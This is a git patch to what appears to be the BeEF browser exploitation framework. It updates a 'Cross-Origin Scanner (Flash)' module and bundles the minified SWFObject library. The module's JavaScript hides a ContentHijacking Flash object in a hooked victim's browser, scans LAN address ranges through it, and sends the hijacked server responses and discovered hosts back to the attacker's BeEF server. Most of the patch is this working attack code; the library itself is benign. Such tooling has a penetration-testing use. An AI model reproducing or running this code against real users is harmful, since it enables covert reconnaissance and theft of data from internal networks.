From fa1e32c0462323dd8349a5a16438259606dcfd91 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Fri, 8 Apr 2016 16:25:52 +0000 Subject: [PATCH] Use SWFObject library for cross_origin_scanner_flash --- arerules/lan_flash_scan.json | 3 +- arerules/lan_flash_scan_common.json | 3 +- .../cross_origin_scanner_flash/command.js | 150 +++++++++--------- .../cross_origin_scanner_flash/config.yaml | 2 +- .../cross_origin_scanner_flash/module.rb | 15 +- .../cross_origin_scanner_flash/swfobject.js | 4 + 6 files changed, 97 insertions(+), 80 deletions(-) create mode 100644 modules/network/cross_origin_scanner_flash/swfobject.js diff --git a/arerules/lan_flash_scan.json b/arerules/lan_flash_scan.json index 4026eddbf..b023e0a66 100644 --- a/arerules/lan_flash_scan.json +++ b/arerules/lan_flash_scan.json @@ -17,8 +17,7 @@ "ipRange":"<>", "ports":"80,8080", "threads":"2", - "wait":"2", - "timeout":"10" + "timeout":"5" } } ], diff --git a/arerules/lan_flash_scan_common.json b/arerules/lan_flash_scan_common.json index f6b16b72e..7726a5472 100644 --- a/arerules/lan_flash_scan_common.json +++ b/arerules/lan_flash_scan_common.json @@ -12,8 +12,7 @@ "ipRange":"common", "ports":"80,8080", "threads":"2", - "wait":"2", - "timeout":"10" + "timeout":"5" } } ], diff --git a/modules/network/cross_origin_scanner_flash/command.js b/modules/network/cross_origin_scanner_flash/command.js index 44a38e2f1..030b5bee9 100644 --- a/modules/network/cross_origin_scanner_flash/command.js +++ b/modules/network/cross_origin_scanner_flash/command.js @@ -11,8 +11,8 @@ beef.execute(function() { var ports = "<%= @ports %>"; var threads = parseInt("<%= @threads %>", 10); var timeout = parseInt("<%= @timeout %>", 10)*1000; - var wait = parseInt("<%= @wait %>", 10)*1000; + // check if Flash is installed (not always reliable) if(!beef.browser.hasFlash()) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error()); return; @@ -52,7 +52,6 @@ beef.execute(function() { return; } // ipRange will be in the form of 192.168.0.1-192.168.0.254 - // the fourth octet will be iterated. // (only C class IP ranges are supported atm) ipBounds = ipRange.split('-'); lowerBound = ipBounds[0].split('.')[3]; @@ -63,13 +62,12 @@ beef.execute(function() { } } - WorkerQueue = function(frequency) { - + // configure workers + WorkerQueue = function(id, frequency) { var stack = []; var timer = null; var frequency = frequency; var start_scan = (new Date).getTime(); - this.process = function() { var item = stack.shift(); eval(item); @@ -77,91 +75,101 @@ beef.execute(function() { clearInterval(timer); timer = null; var interval = (new Date).getTime() - start_scan; - beef.debug("[Cross-Origin Scanner (Flash)] Worker queue is complete ["+interval+" ms]"); + beef.debug("[Cross-Origin Scanner (Flash)] Worker #"+id+" has finished ["+interval+" ms]"); return; } } - this.queue = function(item) { stack.push(item); - if (timer === null) { - timer = setInterval(this.process, frequency); - } + if (timer === null) timer = setInterval(this.process, frequency); } - } - var init = function(id, port) { - var newObjectTag; - var attr = {}, param = {}; - var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf'; - attr = {id: 'cross_origin_flash_<%= @command_id %>_'+id+'_'+port, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'}; - param = {'AllowScriptAccess': 'always'}; - attr.data = url; - newObjectTag = createHTMLObject(attr,param); - beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the new object..."); - document.body.appendChild(newObjectTag); - }; - - // create and embed Flash object - var createHTMLObject = function(attributes, parameters) { - var i, html, div, obj, attr = attributes || {}, param = parameters || {}; - html = ''; - html += ''; + // load the SWF object from the BeEF server + // then request the specified URL via Flash + var scanUrl = function(proto, host, port) { + beef.debug('[Cross-Origin Scanner (Flash)] Creating Flash object...'); + var placeholder_id = Math.random().toString(36).substring(2,10); div = document.createElement('div'); - div.innerHTML = html; - obj = div.firstChild; - div.removeChild(obj); - return obj; - }; + div.setAttribute('id', placeholder_id); + div.setAttribute('style', 'visibility: hidden'); + $j('body').append(div); - // fetch a URL with Flash - var get_url = function(proto, host, port, id) { - var objCaller; - var url = 'http://'+host+':'+port+'/'; - beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url); - objCaller = document.getElementById('cross_origin_flash_<%= @command_id %>_'+id+'_'+port); try { - objCaller.GETURL('function(data) { '+ - 'var proto = "http";' + - 'var host = "'+host+'";' + - 'var port = "'+port+'";' + - 'var data = unescape(data);' + - 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + - 'if (!data.match("Hijacked Contents:")) return;' + - 'var response = data.replace(/^Hijacked Contents:\\r\\n/);' + - 'var title = "";' + - 'if (response.match("(.*?)<\\/title>")) {' + - ' title = response.match("<title>(.*?)<\\/title>")[1];' + - '}' + - 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + - ' }', url); - } catch(e) { - beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); - } - setTimeout('document.body.removeChild(document.getElementById("cross_origin_flash_<%= @command_id %>_'+id+'_'+port+'"));', timeout); + swfobject.embedSWF( + beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf', + placeholder_id, + "1", // Width + "1", // Height + "9", // Flash version required. Hard-coded to 9+ for no real reason. Tested on Flash 12. + false, // Don't prompt user to install Flash + {}, // FlashVars + {'AllowScriptAccess': 'always'}, + {id: 'cross_origin_flash_'+placeholder_id, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'}, + function (e) { + if (e.success) { + // 200 millisecond delay due to Flash executing the callback with a success event + // even though the object is not yet ready to expose its methods to JS + setTimeout(function(){ + var url = 'http://'+host+':'+port+'/'; + beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url); + var objCaller = document.getElementById('cross_origin_flash_'+placeholder_id); + try { + objCaller.GETURL('function(data) { '+ + 'var proto = "http";' + + 'var host = "'+host+'";' + + 'var port = "'+port+'";' + + 'var data = unescape(data);' + + 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + + + 'if (data.match("securityErrorHandler")) {' + + ' beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip="+host+"&status=alive");' + + '}' + + + 'if (!data.match("Hijacked Contents:")) return;' + + 'var response = data.replace(/^Hijacked Contents:\\r\\n/);' + + + 'var title = "";' + + 'if (response.match("<title>(.*?)<\\/title>")) {' + + ' title = response.match("<title>(.*?)<\\/title>")[1];' + + '}' + + + 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + ' }', url); + } catch(e) { + beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); + } + }, 200); + } else if (e.error) { + beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object'); + } else beef.debug('[Cross-Origin Scanner (Flash)] Could not load Flash object. Perhaps Flash is not installed?'); + }); + // Remove the SWF object from the DOM after <timeout> seconds + // this also kills the outbound connections from the SWF object + setTimeout('try { document.body.removeChild(document.getElementById("cross_origin_flash_'+placeholder_id+'")); } catch(e) {}', timeout); + } catch (e) { + beef.debug("[Cross-Origin Scanner (Flash)] Something went horribly wrong creating the Flash object with swfobject: " + e.message); + } + beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the flash object to load..."); } + // append SWFObject script + $j('body').append('<scr'+'ipt type="text/javascript" src="'+beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></scr'+'ipt>'); + + // create workers beef.debug("[Cross-Origin Scanner (Flash)] Starting scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)"); - - // create worker queue var workers = new Array(); - for (w=0; w < threads; w++) { - workers.push(new WorkerQueue(wait)); - } + for (var id = 0; id < threads; id++) workers.push(new WorkerQueue(id, timeout)); - // send Flash request to each IP - var proto = 'http'; - for (var i=0; i < ips.length; i++) { + // allocate jobs to workers + for (var i = 0; i < ips.length; i++) { var worker = workers[i % threads]; - for (var p=0; p < ports.length; p++) { + for (var p = 0; p < ports.length; p++) { var host = ips[i]; var port = ports[p]; - worker.queue("init("+i+", "+port+"); setTimeout(function() {get_url('"+proto+"', '"+host+"', '"+port+"', "+i+");}, 2000)"); + if (port == '443') var proto = 'https'; else var proto = 'http'; + worker.queue("scanUrl('"+proto+"', '"+host+"', '"+port+"');"); } } diff --git a/modules/network/cross_origin_scanner_flash/config.yaml b/modules/network/cross_origin_scanner_flash/config.yaml index 4dc49c978..52ec8a3a6 100644 --- a/modules/network/cross_origin_scanner_flash/config.yaml +++ b/modules/network/cross_origin_scanner_flash/config.yaml @@ -9,7 +9,7 @@ beef: enable: true category: "Network" name: "Cross-Origin Scanner (Flash)" - description: "Scan an IP range for web servers which allow cross-origin requests using Flash. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses.<br/><br/>This module uses ContentHijacking.swf from <a href='https://github.com/nccgroup/CrossSiteContentHijacking'>CrossSiteContentHijacking</a> by Soroush Dalili (@irsdl)." + description: "This module scans an IP range to locate web servers with a permissive Flash cross-origin policy. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses.<br/><br/>This module uses ContentHijacking.swf from <a href='https://github.com/nccgroup/CrossSiteContentHijacking'>CrossSiteContentHijacking</a> by Soroush Dalili (@irsdl)." authors: ["bcoles", "@irsdl"] target: working: ["C", "FF"] diff --git a/modules/network/cross_origin_scanner_flash/module.rb b/modules/network/cross_origin_scanner_flash/module.rb index eb4c933bc..34e6db75c 100644 --- a/modules/network/cross_origin_scanner_flash/module.rb +++ b/modules/network/cross_origin_scanner_flash/module.rb @@ -7,6 +7,7 @@ class Cross_origin_scanner_flash < BeEF::Core::Command def pre_send BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/cross_origin_scanner_flash/ContentHijacking.swf','/objects/ContentHijacking','swf') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/cross_origin_scanner_flash/swfobject.js', '/swfobject', 'js') end def post_execute @@ -19,8 +20,15 @@ class Cross_origin_scanner_flash < BeEF::Core::Command session_id = @datastore['beefhook'] - # log the network service - if @datastore['results'] =~ /proto=(.+)&ip=(.+)&port=([\d]+)&title/ + # log discovered hosts + if @datastore['results'] =~ /^ip=(.+)&status=alive$/ + ip = $1 + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found host #{ip}") + BeEF::Core::Models::NetworkHost.add(:hooked_browser_id => session_id, :ip => ip) + end + # log discovered network services + elsif @datastore['results'] =~ /^proto=(.+)&ip=(.+)&port=([\d]+)&title/ proto = $1 ip = $2 port = $3 @@ -39,8 +47,7 @@ class Cross_origin_scanner_flash < BeEF::Core::Command {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '2'}, - {'name' => 'wait', 'ui_label' => 'Wait (s) between each request for each worker', 'value' => '2'}, - {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'} + {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '5'} ] end diff --git a/modules/network/cross_origin_scanner_flash/swfobject.js b/modules/network/cross_origin_scanner_flash/swfobject.js new file mode 100644 index 000000000..8eafe9dd8 --- /dev/null +++ b/modules/network/cross_origin_scanner_flash/swfobject.js @@ -0,0 +1,4 @@ +/* SWFObject v2.2 <http://code.google.com/p/swfobject/> + is released under the MIT License <http://www.opensource.org/licenses/mit-license.php> +*/ +var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac=Y?/mac/.test(Y):/mac/.test(ah),af=/webkit/.test(ah)?parseFloat(ah.replace(/^.*webkit\/(\d+(\.\d+)?).*$/,"$1")):false,X=!+"\v1",ag=[0,0,0],ab=null;if(typeof t.plugins!=D&&typeof t.plugins[S]==r){ab=t.plugins[S].description;if(ab&&!(typeof t.mimeTypes!=D&&t.mimeTypes[q]&&!t.mimeTypes[q].enabledPlugin)){T=true;X=false;ab=ab.replace(/^.*\s+(\S+\s+\S+$)/,"$1");ag[0]=parseInt(ab.replace(/^(.*)\..*$/,"$1"),10);ag[1]=parseInt(ab.replace(/^.*\.(.*)\s.*$/,"$1"),10);ag[2]=/[a-zA-Z]/.test(ab)?parseInt(ab.replace(/^.*[a-zA-Z]+(.*)$/,"$1"),10):0}}else{if(typeof O.ActiveXObject!=D){try{var ad=new ActiveXObject(W);if(ad){ab=ad.GetVariable("$version");if(ab){X=true;ab=ab.split(" ")[1].split(",");ag=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}}catch(Z){}}}return{w3:aa,pv:ag,wk:af,ie:X,win:ae,mac:ac}}(),k=function(){if(!M.w3){return}if((typeof j.readyState!=D&&j.readyState=="complete")||(typeof j.readyState==D&&(j.getElementsByTagName("body")[0]||j.body))){f()}if(!J){if(typeof j.addEventListener!=D){j.addEventListener("DOMContentLoaded",f,false)}if(M.ie&&M.win){j.attachEvent(x,function(){if(j.readyState=="complete"){j.detachEvent(x,arguments.callee);f()}});if(O==top){(function(){if(J){return}try{j.documentElement.doScroll("left")}catch(X){setTimeout(arguments.callee,0);return}f()})()}}if(M.wk){(function(){if(J){return}if(!/loaded|complete/.test(j.readyState)){setTimeout(arguments.callee,0);return}f()})()}s(f)}}();function f(){if(J){return}try{var Z=j.getElementsByTagName("body")[0].appendChild(C("span"));Z.parentNode.removeChild(Z)}catch(aa){return}J=true;var X=U.length;for(var Y=0;Y<X;Y++){U[Y]()}}function K(X){if(J){X()}else{U[U.length]=X}}function s(Y){if(typeof O.addEventListener!=D){O.addEventListener("load",Y,false)}else{if(typeof j.addEventListener!=D){j.addEventListener("load",Y,false)}else{if(typeof O.attachEvent!=D){i(O,"onload",Y)}else{if(typeof O.onload=="function"){var X=O.onload;O.onload=function(){X();Y()}}else{O.onload=Y}}}}}function h(){if(T){V()}else{H()}}function V(){var X=j.getElementsByTagName("body")[0];var aa=C(r);aa.setAttribute("type",q);var Z=X.appendChild(aa);if(Z){var Y=0;(function(){if(typeof Z.GetVariable!=D){var ab=Z.GetVariable("$version");if(ab){ab=ab.split(" ")[1].split(",");M.pv=[parseInt(ab[0],10),parseInt(ab[1],10),parseInt(ab[2],10)]}}else{if(Y<10){Y++;setTimeout(arguments.callee,10);return}}X.removeChild(aa);Z=null;H()})()}else{H()}}function H(){var ag=o.length;if(ag>0){for(var af=0;af<ag;af++){var Y=o[af].id;var ab=o[af].callbackFn;var aa={success:false,id:Y};if(M.pv[0]>0){var ae=c(Y);if(ae){if(F(o[af].swfVersion)&&!(M.wk&&M.wk<312)){w(Y,true);if(ab){aa.success=true;aa.ref=z(Y);ab(aa)}}else{if(o[af].expressInstall&&A()){var ai={};ai.data=o[af].expressInstall;ai.width=ae.getAttribute("width")||"0";ai.height=ae.getAttribute("height")||"0";if(ae.getAttribute("class")){ai.styleclass=ae.getAttribute("class")}if(ae.getAttribute("align")){ai.align=ae.getAttribute("align")}var ah={};var X=ae.getElementsByTagName("param");var ac=X.length;for(var ad=0;ad<ac;ad++){if(X[ad].getAttribute("name").toLowerCase()!="movie"){ah[X[ad].getAttribute("name")]=X[ad].getAttribute("value")}}P(ai,ah,Y,ab)}else{p(ae);if(ab){ab(aa)}}}}}else{w(Y,true);if(ab){var Z=z(Y);if(Z&&typeof Z.SetVariable!=D){aa.success=true;aa.ref=Z}ab(aa)}}}}}function z(aa){var X=null;var Y=c(aa);if(Y&&Y.nodeName=="OBJECT"){if(typeof Y.SetVariable!=D){X=Y}else{var Z=Y.getElementsByTagName(r)[0];if(Z){X=Z}}}return X}function A(){return !a&&F("6.0.65")&&(M.win||M.mac)&&!(M.wk&&M.wk<312)}function P(aa,ab,X,Z){a=true;E=Z||null;B={success:false,id:X};var ae=c(X);if(ae){if(ae.nodeName=="OBJECT"){l=g(ae);Q=null}else{l=ae;Q=X}aa.id=R;if(typeof aa.width==D||(!/%$/.test(aa.width)&&parseInt(aa.width,10)<310)){aa.width="310"}if(typeof aa.height==D||(!/%$/.test(aa.height)&&parseInt(aa.height,10)<137)){aa.height="137"}j.title=j.title.slice(0,47)+" - Flash Player Installation";var ad=M.ie&&M.win?"ActiveX":"PlugIn",ac="MMredirectURL="+O.location.toString().replace(/&/g,"%26")+"&MMplayerType="+ad+"&MMdoctitle="+j.title;if(typeof ab.flashvars!=D){ab.flashvars+="&"+ac}else{ab.flashvars=ac}if(M.ie&&M.win&&ae.readyState!=4){var Y=C("div");X+="SWFObjectNew";Y.setAttribute("id",X);ae.parentNode.insertBefore(Y,ae);ae.style.display="none";(function(){if(ae.readyState==4){ae.parentNode.removeChild(ae)}else{setTimeout(arguments.callee,10)}})()}u(aa,ab,X)}}function p(Y){if(M.ie&&M.win&&Y.readyState!=4){var X=C("div");Y.parentNode.insertBefore(X,Y);X.parentNode.replaceChild(g(Y),X);Y.style.display="none";(function(){if(Y.readyState==4){Y.parentNode.removeChild(Y)}else{setTimeout(arguments.callee,10)}})()}else{Y.parentNode.replaceChild(g(Y),Y)}}function g(ab){var aa=C("div");if(M.win&&M.ie){aa.innerHTML=ab.innerHTML}else{var Y=ab.getElementsByTagName(r)[0];if(Y){var ad=Y.childNodes;if(ad){var X=ad.length;for(var Z=0;Z<X;Z++){if(!(ad[Z].nodeType==1&&ad[Z].nodeName=="PARAM")&&!(ad[Z].nodeType==8)){aa.appendChild(ad[Z].cloneNode(true))}}}}}return aa}function u(ai,ag,Y){var X,aa=c(Y);if(M.wk&&M.wk<312){return X}if(aa){if(typeof ai.id==D){ai.id=Y}if(M.ie&&M.win){var ah="";for(var ae in ai){if(ai[ae]!=Object.prototype[ae]){if(ae.toLowerCase()=="data"){ag.movie=ai[ae]}else{if(ae.toLowerCase()=="styleclass"){ah+=' class="'+ai[ae]+'"'}else{if(ae.toLowerCase()!="classid"){ah+=" "+ae+'="'+ai[ae]+'"'}}}}}var af="";for(var ad in ag){if(ag[ad]!=Object.prototype[ad]){af+='<param name="'+ad+'" value="'+ag[ad]+'" />'}}aa.outerHTML='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"'+ah+">"+af+"</object>";N[N.length]=ai.id;X=c(ai.id)}else{var Z=C(r);Z.setAttribute("type",q);for(var ac in ai){if(ai[ac]!=Object.prototype[ac]){if(ac.toLowerCase()=="styleclass"){Z.setAttribute("class",ai[ac])}else{if(ac.toLowerCase()!="classid"){Z.setAttribute(ac,ai[ac])}}}}for(var ab in ag){if(ag[ab]!=Object.prototype[ab]&&ab.toLowerCase()!="movie"){e(Z,ab,ag[ab])}}aa.parentNode.replaceChild(Z,aa);X=Z}}return X}function e(Z,X,Y){var aa=C("param");aa.setAttribute("name",X);aa.setAttribute("value",Y);Z.appendChild(aa)}function y(Y){var X=c(Y);if(X&&X.nodeName=="OBJECT"){if(M.ie&&M.win){X.style.display="none";(function(){if(X.readyState==4){b(Y)}else{setTimeout(arguments.callee,10)}})()}else{X.parentNode.removeChild(X)}}}function b(Z){var Y=c(Z);if(Y){for(var X in Y){if(typeof Y[X]=="function"){Y[X]=null}}Y.parentNode.removeChild(Y)}}function c(Z){var X=null;try{X=j.getElementById(Z)}catch(Y){}return X}function C(X){return j.createElement(X)}function i(Z,X,Y){Z.attachEvent(X,Y);I[I.length]=[Z,X,Y]}function F(Z){var Y=M.pv,X=Z.split(".");X[0]=parseInt(X[0],10);X[1]=parseInt(X[1],10)||0;X[2]=parseInt(X[2],10)||0;return(Y[0]>X[0]||(Y[0]==X[0]&&Y[1]>X[1])||(Y[0]==X[0]&&Y[1]==X[1]&&Y[2]>=X[2]))?true:false}function v(ac,Y,ad,ab){if(M.ie&&M.mac){return}var aa=j.getElementsByTagName("head")[0];if(!aa){return}var X=(ad&&typeof ad=="string")?ad:"screen";if(ab){n=null;G=null}if(!n||G!=X){var Z=C("style");Z.setAttribute("type","text/css");Z.setAttribute("media",X);n=aa.appendChild(Z);if(M.ie&&M.win&&typeof j.styleSheets!=D&&j.styleSheets.length>0){n=j.styleSheets[j.styleSheets.length-1]}G=X}if(M.ie&&M.win){if(n&&typeof n.addRule==r){n.addRule(ac,Y)}}else{if(n&&typeof j.createTextNode!=D){n.appendChild(j.createTextNode(ac+" {"+Y+"}"))}}}function w(Z,X){if(!m){return}var Y=X?"visible":"hidden";if(J&&c(Z)){c(Z).style.visibility=Y}else{v("#"+Z,"visibility:"+Y)}}function L(Y){var Z=/[\\\"<>\.;]/;var X=Z.exec(Y)!=null;return X&&typeof encodeURIComponent!=D?encodeURIComponent(Y):Y}var d=function(){if(M.ie&&M.win){window.attachEvent("onunload",function(){var ac=I.length;for(var ab=0;ab<ac;ab++){I[ab][0].detachEvent(I[ab][1],I[ab][2])}var Z=N.length;for(var aa=0;aa<Z;aa++){y(N[aa])}for(var Y in M){M[Y]=null}M=null;for(var X in swfobject){swfobject[X]=null}swfobject=null})}}();return{registerObject:function(ab,X,aa,Z){if(M.w3&&ab&&X){var Y={};Y.id=ab;Y.swfVersion=X;Y.expressInstall=aa;Y.callbackFn=Z;o[o.length]=Y;w(ab,false)}else{if(Z){Z({success:false,id:ab})}}},getObjectById:function(X){if(M.w3){return z(X)}},embedSWF:function(ab,ah,ae,ag,Y,aa,Z,ad,af,ac){var X={success:false,id:ah};if(M.w3&&!(M.wk&&M.wk<312)&&ab&&ah&&ae&&ag&&Y){w(ah,false);K(function(){ae+="";ag+="";var aj={};if(af&&typeof af===r){for(var al in af){aj[al]=af[al]}}aj.data=ab;aj.width=ae;aj.height=ag;var am={};if(ad&&typeof ad===r){for(var ak in ad){am[ak]=ad[ak]}}if(Z&&typeof Z===r){for(var ai in Z){if(typeof am.flashvars!=D){am.flashvars+="&"+ai+"="+Z[ai]}else{am.flashvars=ai+"="+Z[ai]}}}if(F(Y)){var an=u(aj,am,ah);if(aj.id==ah){w(ah,true)}X.success=true;X.ref=an}else{if(aa&&A()){aj.data=aa;P(aj,am,ah,ac);return}else{w(ah,true)}}if(ac){ac(X)}})}else{if(ac){ac(X)}}},switchOffAutoHideShow:function(){m=false},ua:M,getFlashPlayerVersion:function(){return{major:M.pv[0],minor:M.pv[1],release:M.pv[2]}},hasFlashPlayerVersion:F,createSWF:function(Z,Y,X){if(M.w3){return u(Z,Y,X)}else{return undefined}},showExpressInstall:function(Z,aa,X,Y){if(M.w3&&A()){P(Z,aa,X,Y)}},removeSWF:function(X){if(M.w3){y(X)}},createCSS:function(aa,Z,Y,X){if(M.w3){v(aa,Z,Y,X)}},addDomLoadEvent:K,addLoadEvent:s,getQueryParamValue:function(aa){var Z=j.location.search||j.location.hash;if(Z){if(/\?/.test(Z)){Z=Z.split("?")[1]}if(aa==null){return L(Z)}var Y=Z.split("&");for(var X=0;X<Y.length;X++){if(Y[X].substring(0,Y[X].indexOf("="))==aa){return L(Y[X].substring((Y[X].indexOf("=")+1)))}}}return""},expressInstallCallback:function(){if(a){var X=c(R);if(X&&l){X.parentNode.replaceChild(l,X);if(Q){w(Q,true);if(M.ie&&M.win){l.style.display="block"}}if(E){E(B)}}a=false}}}}(); \ No newline at end of file